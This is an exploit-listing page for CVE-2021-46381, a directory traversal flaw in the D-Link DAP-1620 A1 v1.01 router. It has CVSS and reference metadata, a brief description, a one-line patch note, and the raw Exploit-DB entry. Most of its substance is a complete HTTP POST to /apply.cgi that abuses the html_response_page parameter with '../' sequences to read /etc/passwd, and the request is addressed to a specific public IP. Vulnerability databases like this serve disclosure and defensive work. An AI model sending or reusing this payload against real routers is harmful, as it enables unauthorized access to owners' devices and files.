DLINK DAP-1620 A1 v1.01 - Directory Traversal

vendor:

DAP-1620 A1

by:

Momen Eldawakhly (Cyber Guy)

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: DAP-1620 A1

Affected Version From: DAP-1620 - A1 v1.01

Affected Version To: DAP-1620 - A1 v1.01

Patch Exists: YES

Related CWE: CVE-2021-46381

CPE: h:dlink:dap-1620_a1:v1.01

Metasploit:

Other Scripts:

Tags: lfi,router,packetstorm,cve,cve2021,dlink

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Nuclei References: https://drive.google.com/drive/folders/19OP09msw8l7CJ622nkvnvnt7EKun1eCG?usp=sharing, https://www.dlink.com/en/security-bulletin/, https://nvd.nist.gov/vuln/detail/CVE-2021-46381, http://packetstormsecurity.com/files/167070/DLINK-DAP-1620-A1-1.01-Directory-Traversal.html

Nuclei Metadata: {'max-request': 1, 'vendor': 'dlink', 'product': 'dap-1620_firmware'}

Platforms Tested: Linux

2022

DLINK DAP-1620 A1 v1.01 – Directory Traversal

This exploit allows an attacker to traverse the directory structure of the DLINK DAP-1620 A1 v1.01 router by sending a specially crafted HTTP POST request. The request contains a parameter that points to the directory structure of the router, which can be used to access sensitive files such as the /etc/passwd file.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their routers to the latest version.

Source

Exploit-DB raw data:

# Exploit Title: DLINK DAP-1620 A1 v1.01 - Directory Traversal
# Date: 27/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://me.dlink.com/consumer
# Version: DAP-1620 - A1 v1.01
# Tested on: Linux
# CVE : CVE-2021-46381

POST /apply.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://84.217.16.220/
Cookie: ID=634855649
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Content-Length: 281
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: 84.217.16.220
Connection: Keep-alive

action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass